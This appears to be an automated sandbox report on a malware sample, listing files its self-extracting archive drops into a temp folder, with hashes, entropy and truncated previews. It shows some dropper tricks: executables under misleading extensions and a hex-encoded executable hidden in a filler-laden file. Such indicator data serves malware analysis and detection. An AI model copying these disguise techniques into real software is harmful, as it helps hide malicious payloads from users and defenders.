                                                            Preview:88M1ak5g6X4Wpk..3Inr3h1UuKjOPn0Z7wf6COg240sG536nS56Y0960L574r3x90u8328wRXC28688..4591Bui610yG7qa6y8W61V14qMc89C78h5580PyBf92e3..9z103T41U84872S62M768h3m645V8iLZ0Q77rx45rPsrPq6LnHnCI6k0kCJ..7c6o0f3n3423OuGRc1QPG58378qNHeDpq11IdT0b0VXY713I2C2IELtA3339xfw96I9J97ebP82q3..096oXVPYC188WS68XnM3T8X8P06w2I908Jrwx7Ro6xG7in370kI85YVq00H7177s11u4op3MN..TQqw26ae7n2f98i7709337h3RO8WTJ636sgu5QN03OBTiW5RA5l40Os56N0b..wT6628IJ1O00J1E36ttL8R9ek6k8Z07340nJCY02v07a9vc45i2oi..F4dn1cMAxi54xyl5e346A4284N2L56Ewb418026Oc0C579X85ORnO193tZ9pGo..6ew46AzpJ788VE7t6u1ab5u7XsGAUBFMjt846nZ37RQdE0AzwS9n66ZjB80062B0K9P66mJJS5Z66JBgRLcdMBQ10..F5o725KqV26Cq23988Glv1I668mpS73252N7Dd4D3012094aT0g5828a39IGQ9W9ET3YpQ5oJ986750g0..W993DG3349S4ln00m3yv3h575824p5Vs8517uitTf1hR8gDkoPHT3..55h03o8TM1b0965T6g2XB5ZGxM6U..0YC4mBU7JQ383mt3bHG9qih18U11133Oa439338y4U820mljq8Pd4u21..74204rz7pu2583mr173vHki684qqDl906Rvy976TRls2cQ7s3B8rP..3q3ON2GZ60BCZxL9K48886h9455Js09vT9CjN095AF..YB3j046mN988T77L8T4X8Y7w47u0B75knO0U0B38x3l3GkLQkbou9qK8j3Bc

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\hjca.vbe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):84984
                                                            Entropy (8bit):2.9903521299108915
                                                            Encrypted:false
                                                            SSDEEP:24:QRP5P5P5P5P5P5P5P5P5P5P5P5P5P5P5PA0YeeeeeeeeeeeeeeeeeeeeeaYSSSSa:IHiW6WDhWC6lnIhnrQ
                                                            MD5:AE7483D6C77F985615D1A9773CF32FA4
                                                            SHA1:DF4224A3D4254710A23540C67508EE2E855311AD
                                                            SHA-256:BF37F552799B94662EC2D476D1DE56CD5DF26A74AF0303B47631C4E9EF28DC63
                                                            SHA-512:37F33701B9775824E9387DA02460E743BD166C681C16F50250253D3DFB9039D16125BCFCD14C795575512192DDF639080568577111DFDB1B46AE21CD9BEE1EEA
                                                            Malicious:false
                                                            Preview:..T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.....T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.....T.e.l.e.V.r.a.m.(.4.4.).:.T.e.l.e.V.r.a.m.(.4.

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\jxfpvfxwoe.3gp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):645
                                                            Entropy (8bit):5.557586766694295
                                                            Encrypted:false
                                                            SSDEEP:12:jpm92LT7ZCy1K8BPU8RLZjdahra+gLMgo6iwlhh2pW60D3gLCOGLv6bICL:QuZy8/LZjdasno6ip70DMTGr6bHL
                                                            MD5:10E739785CD454F2A477C9FEC9FE4A93
                                                            SHA1:88436B1606ECD432A9CBBB226A497F3F69E200B6
                                                            SHA-256:ABCEFD6184280165128C23B72ED46AA34C2E77E956AFA7EF2B2CE748FBAFA565
                                                            SHA-512:7B60546D5AA028AB8EDD2D6EBDEF6F3EC25D0ECBBD623ADC2CFC791CED54E27E081DF3E738135D278240B71FDE45353E3FCB8618823E16B0C67AF55BB35146D1
                                                            Malicious:false
                                                            Preview:4ma268jx5pe0Np1O4j8F5b8F610ECe9jg04p0I6Ms63J7qlj6Q3Re8Sw..DateTimeConstants FontConstants..9GIYgs8ms8HckR04eyO1e332wdd5..FontConstants TreeViewConstants..N4677x6it9bgevv36s742bCI94PIIn7PcXX168F6FT575616Z11zH95Rn38XI16x7060LWPzm8qxxt774X6K24I58S9hng3O7A8..DateTimeConstants ComboConstants..6dI07O30n27Z44L5Bni6Sc8t25H8c1s1PRI92j0DjBWM7U4309A33NA8xh8g1iDo21064G6qo40340DcYC494Lp5T73d12Fo077LD6F1yC8S5y1k5BW90..DateTimeConstants GuiDateTimePicker..HyJIwy..BorderConstants UpDownConstants..v7H0o3D71AX707671666D7667u32el54e3A66g0lHchd0q7iCRzr80S4916E2Jv685863U2wx1ZqG816w70ySEG9s7UY62K757vo84283uWTkX4Gc26yP8SH7..StructureConstants ButtonConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\mhauxsgjt.ppt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):569
                                                            Entropy (8bit):5.546164799845927
                                                            Encrypted:false
                                                            SSDEEP:6:yPLxTS4m/mxNlRwBkQRfLobhJhEWpjRIlM/IGWKd0QRI5LWiE6r4jVdKe5LWYzwU:6xTFqBhJEbhDKkb+ER6UWeTwLTDDbE1
                                                            MD5:5C2105F29D585C991E34474F76511B8B
                                                            SHA1:B8F45DDB8B66554FFF166823B3839A6754A203F1
                                                            SHA-256:E24AC134DC8B26B8036B0CD4671E4FC722E3391D5D72B897070398ED0D377353
                                                            SHA-512:854187C18AC225D61EAB217763B822D839A0082CCE5482385D9D1EED9E18F44C93CA098ACCF1C8BE8457F24DBD34F1E2FE4A354B6C8BE88559037C406DCAAD7A
                                                            Malicious:false
                                                            Preview:SM5D2N7T369p69jne3p6tH6JMCG8F1..ButtonConstants ButtonConstants..2R9W446J4613LLY6tli151Vm18qVM5BZ40Hv28M4l48C19t7b4TZlH0675jY89Q40x42Q7H8Fvgt7E9F802fOWhOi32h0R8354w13Q5r750HJY31K97HT43R984DaKRM4o2uR2Z1cVg5842HECr98G9FjmF14o0323M2l4cy4..ButtonConstants DateTimeConstants..X073683u29EW9n5J6AMJaB1DJ67x3Lv122164F3vQ8nG1n166q589T08CD6jK87l59OM55CFhnNJOx1..ToolbarConstants DateTimeConstants..WHkj91w1U6V747Ra4815Jv1o0K190L107wOau5f58q24Sa6250Yl2yn6TWs9p7V6HRK9k28K1699C7901392Q7brLd966ubRYC5w7XXtC4274O6h5ucp312c558m90r3lE3TCa541lJX5nXbbQ..GuiDateTimePicker FileConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\mldq.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.506003077562106
                                                            Encrypted:false
                                                            SSDEEP:12:8XeVpRuKqetRNY9UW4DcMld6L/JQdcj0hwExqh7qkk9jhh:8apRunsNY9zwbld6LXujkWD9h
                                                            MD5:350AD61843075D982363E7DA5685789E
                                                            SHA1:1E3649C8683F73AE16F704C29E46D71FA2D3725C
                                                            SHA-256:B6C17B3F5AA47450425E920AB286E5CF5E3988271F977AE1BA969A872B9BB665
                                                            SHA-512:BEDB2CB274C7400EF8B6A39C9C5D5DB159C1CF02640F145DAA69600121A9D5A617D5BEDA4D9A6F245A33AA4C4AD3EC06C06778CAF864C06DF656BBEB81138C2E
                                                            Malicious:false
                                                            Preview:614U7iN7ZKHLl00060c35S704NfelQ056Yl50oB4QL406BuwKks1E991x0a98p8zhgLS2PwTw7Urz1qX75ENyeo5r31..StructureConstants ColorConstants..325b7L4hq467y90eM9E3T9iSh45Y689b083w85l1MV3a2k6TC4L7002qUv63Q34L904U45D99n0udbX3p7k088F..ButtonConstants ButtonConstants..109X69g8795it4ZCoBJTI63ioBh7999n25K9F9Rq9e6k77847XxBkV7qPHge2V2T78UzX..DateTimeConstants FileConstants..dK3206T1..FileConstants ToolTipConstants..c5Uaas4A3l5P50bVi39xR974uf9di1..ButtonConstants ComboConstants..Mz2E111x02Lb92LXs3D6Sos3zR2745W00F06zLv8759xr9ZL4j1IEL44I9834igo7G164Kyfk2RMRA..StructureConstants FileConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\nhhjmppg.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):115071724
                                                            Entropy (8bit):7.040365181374398
                                                            Encrypted:false
                                                            SSDEEP:98304:FNTNKNeNUNAN+NTNmNFNbNmN2NYNmNpNXNbNCNINVN8NeNNNBNPNLNCNjNINJNDt:B
                                                            MD5:E15FB1F8600E5EEDE00A8CA7FF8012D1
                                                            SHA1:53EA558E9EA5F975CE0D0E379BA4D2A8D9CB4968
                                                            SHA-256:4BE158BB86B94202C4DF7FB5F57EE8D3D229CB2D64E7CF764A0F2A488D517082
                                                            SHA-512:34788AA4D0BCE701C3A0DCF75C90E3DC221A7ABDF3720AF828874233A24DEB5697434E331AA43D21788EE96A9B802F1E76610FFBA2F72EF523B053C46E62FF95
                                                            Malicious:false
                                                            Preview:..;.F..F@.j*1.....Q#z...G".....!yB...y..!\....{(.)K.K.3Zk.......sp/...9.V...H..,h..J..W.....\./............r.!5....x.yI....O..........#.c.s......U.....\HgVE..R.u.2....>V.....y6.]..W..!O.a......g.|.DN?@....p..:N..K..cz....Wk?..L.....P.-.yj........x=u......7.{.R.Di.!w.8.u..G9(.t.#dKT.U...(....}.<..;$.@..6Uq.....b...:._Fh'.....P.#.|F.wt.2*.'N.....B....W..H....@U.a....6.9.l.P.1.6.y.2.H.Q.L.0.Z.Y.5.Q.9.1.0.3.8.y.j.1.s.1.Y.9.1.4.u.0.S.5.7.V.1.1.7.S.q.2.2.0.....z..E...0.d.E.n..F@.P..&..&5...S..YM..}+.y.`...H*...q...."...}1Q..7./..F37.C.dSK..uWQ..t.(./&_o....:.4...Z>....5.3.3.i.A.6.d.1.0.3.4.z.Y.5.1.p.1.8.D.4.r.J.g.8.0.Y.F.1.6.9.2.v.b......)j.D.;M<?bE-..<.8R......{......=7py>.>.2...e....,.L.\...X....=..b..^.X........Q.....{vI^.]g[..O5..0U./....#=,9..Wz.5..L......qe.S."....S...4w.>_.A#m.b.7.r.......{..p..G+.z.[.-J:...#.U..Y..k..N&0.LQ.#..p.t._."1.0.i..~..E...2..B2h.q4..W.K.R......,....1.F.8.V.I.5.X.H.8.4.D.I.X.4.9.j.1.Q.X.5.c.d.....S..t.c6.{....d\0...!.F.pN..-

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\nmktnvu.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.54174792855503
                                                            Encrypted:false
                                                            SSDEEP:12:V1dtZGuB0144JUBpXIXYQTPaafLpWhV5cX4qLPtmWqRc:ttZjQ44JUBpXI1TftWh2VAc
                                                            MD5:50E0655BD2AD0316466463E9BA2BFB7A
                                                            SHA1:9EFCC43BAB881C5ED0C25DCB5B71C8F77B017B77
                                                            SHA-256:DC284BA52997D1F413830AAA7DADC69C36D9E7F80C0EBA5B51A533359F13D88C
                                                            SHA-512:642385885F4391D4830E16E0DD1F1B90BE07879105023D968613A7499D131AE1AEF927434D4677B2CC15159F0EDFCE6C6D4661A0DB3106A266F1B7A01F90985F
                                                            Malicious:false
                                                            Preview:41rx9j46e8774Q0k055j29vDB39ly790P2iBnpB61RPYczDCTr4C1PJ3C8t4Icmp3DCUq7854cjTI9X681EZu812rH22v562MZgt3365Y0J3BXWgDG2s51620S12u0h85j189p4P7z5zcLeRxb5..ComboConstants UpDownConstants..37U5MZ3d76v1VD2H8kj3gzq50I6718xA41069T54Us0p0A8O07EmC2WoEV8OU1vUXCq..ColorConstants ToolTipConstants..RSo7L8oB5gmp0GMU..ButtonConstants ButtonConstants..44t458LiNU72iV7c14Z..DateTimeConstants GuiDateTimePicker..28tB5B90yi282nszu56931d957YFxXq273v363C0WdG99Mw2UhTxLg352Hl0I..FontConstants ButtonConstants..3127S1375ZjND6l46MU8Hlp163T48ff4..DateTimeConstants StructureConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\ofnbqr.icm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.630202092843055
                                                            Encrypted:false
                                                            SSDEEP:12:8wEinxz9TysEq0P2ubtawsMMy50P9RrvsyUUR5mvjXvrAW2OfsToaiRjP7:8xe3G/Mubtfs1yYrvsyUI5mrBnsw/
                                                            MD5:2D4C59440B9BA7F2602B787A4E54EC69
                                                            SHA1:2E83423FF6F24DB5EBC610535BF95194CC7DDE58
                                                            SHA-256:6B376AA5918FBC51CFF3557373CC24307971F1C4C12E5C9F81DB3455FAFA6D25
                                                            SHA-512:A14359E1D7ED9AA196DB723F7FB59883482C84AA1C29093F56FEB6B400F33E3D2A9DF58D8EB20283AD0B63DD12AB0BA447871411174AD911FB800C2CED50F51D
                                                            Malicious:false
                                                            Preview:2026m279q345qg7M7s697E173Tt2p186Lcv796SPkY6G93T9Hwy0c80h1jKW8F3EIK9yGir27L2vM794P586zJ..TreeViewConstants ToolbarConstants..92Q5cHUkbG08oG02Bp8raMsl4y5c79gd27w49Rhk215s2SP9480n1bha2407293BpL978x1G36019E10h1kz6442xzKG5H8zjA0..TreeViewConstants StructureConstants..43Tu3479C8sFmhlS7XwhfH2X84HI12TW5yJ7892p3NG6j18697vo71a9093oeVF2Y7800L414pv328dY..FileConstants GuiDateTimePicker..RC5718ZRq92T9sY5Zs6Yd3B93777ML67F2m780O681BS22442IdS58bOg4BF79G3a5Z..GuiDateTimePicker ButtonConstants..16S622KK43683FGk96y2vov7FBCLN9R06O52O320hVNAlcFqI4z82Ul9WfT8gJ3a8Nd4T..TreeViewConstants ComboConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\qlmmu.msc

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):625
                                                            Entropy (8bit):5.475853492450421
                                                            Encrypted:false
                                                            SSDEEP:12:DcUgueO/P9RWMqKSbFt0P1u/UiE5mK/h53jJ6IijPARR:DcmV3vHSr/dE5mK/f96IiLARR
                                                            MD5:BF3CD347D5614EE1FC2AB7B1798164BB
                                                            SHA1:976562CC6D244AEFCA909FF3A31727E3AD710937
                                                            SHA-256:3605CD8EF5F90DB2E66E7EDFAA6B2F2CC376302112241BEF4BAD162F7C7EAB53
                                                            SHA-512:781A76D891CCFE35509E1D3C255D7E72F5D09A4A4DFBA5060802FC90C4989978660065DBB1ECAB4EEA1EE150DC9AD39CFA27CF0ED0879A1DE2BCD6E55C0B6483
                                                            Malicious:false
                                                            Preview:4b3vA9keP540R63i91C23..ButtonConstants DateTimeConstants..91aS881dbML4j1c98a3hfLh6N3600468o69eP9X040gwnZKX7u668MpOe7HIijmO47753T0632nH..TreeViewConstants StructureConstants..656p7OMVN24L77D9V1aLRL6Oc61937719..DateTimeConstants ButtonConstants..18f9007I1F0L606..TreeViewConstants FileConstants..s5YxrUg99915U198f1aFx39rC0417yXg320546w00O55J1NSZuqx0K256C68q3ll75F3h5l4F74o02O39avhy5R66Jy995k1zqi2Cwot0bKc2Z5168801E6o6dKK980CqRrV217t0975693Q645m4jFleB64re387Yaw53..ComboConstants ToolbarConstants..n8090464a26032Cw1KH6E4Pnu18079kn9EV98S6a644421Y9087z085vN124t9ANF89a5vU1U27K67lCC2Rz32fw1f8R..GuiDateTimePicker ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\rrdkmeratu.mp2

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):520
                                                            Entropy (8bit):5.6112414182811925
                                                            Encrypted:false
                                                            SSDEEP:12:kYidxNWWfUDF+acTH1en9OuSeVpmengFDjlLnMgyLOKmClB2rzujB0tP2R:kYIWWfWwhw99HFnSjlLnkpm64zkBXR
                                                            MD5:A46A327A0FCD8505553A963445E7E509
                                                            SHA1:3F15FBD861C19C4817A986F949C2A42808807975
                                                            SHA-256:0FCBF77B85E94EC077B5C96EC53FFCE6F1B2F559BF712A12387F189F6C544093
                                                            SHA-512:F5CF3EE0E0F9280E88A4C0E245F09C9699707F899575D76B8F406C1E1D8D3595D272F67644C702115B6E760614232623D552171FE1A6ECAC7063B956C22ED75F
                                                            Malicious:false
                                                            Preview:sL7gZM51T4a60J12e1zS61P5M51g9nSfUj0TUo8ws19Y40rI6uX92cP406a39Y11m8Q1638XHgSlSP45Y5mF673o8yk2y47W2t3pN6k2TYP31DBO51Qo6P4..DateTimeConstants DateTimeConstants..17djs29a5r166S1yA6dr023Vu509650MwK19e100OTKnK9FB80Zg0IZ49338cCzt4Veb1Mq0tVEs1Jx1K630655R1Mw881IKN2Io0r12R63nbv45DdOjON587uXA52Nc0j8s2I02qH..FontConstants UpDownConstants..XguGe0374591GMBNpL3VEWc59rWn4j4T5Eia603FcPWu2w0Ds7z36JyhFZ3d9026017Uae1DP8n682zdGpc3c59266f430S2L7LGy74i4170OM64D5j57S178NzkZP591I6ImR273S6j94t8W6rGz46v3..TreeViewConstants ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: qPLzfnxGbj.exe, Detection: malicious, Browse
                                                            • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                            • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                                            • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                            • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                            • Filename: lcbF0sywlU.exe, Detection: malicious, Browse
                                                            • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                            • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                            • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                            • Filename: qZkywW6Q0b.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: qPLzfnxGbj.exe, Detection: malicious, Browse
                                                            • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                            • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                                            • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                            • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                            • Filename: lcbF0sywlU.exe, Detection: malicious, Browse
                                                            • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                            • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                            • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                            • Filename: qZkywW6Q0b.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\twna.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):545
                                                            Entropy (8bit):5.58091263701808
                                                            Encrypted:false
                                                            SSDEEP:12:Tnqr73jzdJDfIR2GeKGt5K7Vu7PGKlS2Q6FVBPc:2lJza25t5K7VYT66bO
                                                            MD5:F1A4A151D27950929A91C6C98DD4386C
                                                            SHA1:693545012853D5C5A82778B73A766D0571B812CF
                                                            SHA-256:593EBB913D36131695583CA72F0089D896219F7184E96576D62A470D2481271C
                                                            SHA-512:66DE7CB53C15B52B786E246B7E0D60866EE69207B22579A59CA142F063F59F5FA59209B8104457E43D6F8A6B6E3037346E1ACCC1506C62D279608970CC765316
                                                            Malicious:false
                                                            Preview:LBk10C5325TYW40h7sXHNWaoJ58h..ComboConstants FileConstants..9394eH54r2SmH59329772649xJQgnK74oY24xZaYcrz4jz173293338e2DHs45C6li35gG13GGJvl440ICwz50H16P6476837Ei4y63Tw6LMCmG62Om6sY2Ia..ButtonConstants StructureConstants..9k86ONlpV05GBZ9B7mC8vL90p9jnfBV0cO9Pn750xq9s52q60z16tRz0005A0sNw1n366i53bSY0Dl84675uI30k..ToolbarConstants ToolbarConstants..92ViO23876XSs6aO83d8gtk16pV2f389r20dD42Ep2JmbDTzm43227T40QXJtO508W46K23441z60UCCM7TUI8675n1l0T451re4dpL9EY4WouO1AVS1S8F415Q561sN3Mf522cjAp39Dl20op0Qj508741vHpMz6m019c..FileConstants TreeViewConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\uemcpv.anw

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):571495
                                                            Entropy (8bit):4.050101452531791
                                                            Encrypted:false
                                                            SSDEEP:6144:S8+nw3X1oeYXD39Gp74IazTb9A/OZBWxCcY5Nydt:sRe+DtU7FapA/Ork
                                                            MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                            SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                            SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                            SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                            Malicious:false
                                                            Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\uvlpmsr.icm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):582
                                                            Entropy (8bit):5.529913214319818
                                                            Encrypted:false
                                                            SSDEEP:12:5Vl2jmcGvcR3vv6oOolhpPDO6gSIxYYITpyTjpRM:r0jmcEcRX61ovliPYYITV
                                                            MD5:2F2C210833CD14B8EAD0EEEBD118308C
                                                            SHA1:BAB671003DD2BDF41EA415C7FD34CD334FCD74D7
                                                            SHA-256:49482D956DFE1659D6EB46A6540943779A2286A3BDB098CD3408821CBFA6C7BC
                                                            SHA-512:9772264E779E6BE0837BC4AE84C411AAC8D810F6582A7E4A475DF87F4FEF7FBA1A391DBCFB0E181AFCB9BC9F34E0848173A69D13D53B7EC92DE66268FA2B6798
                                                            Malicious:false
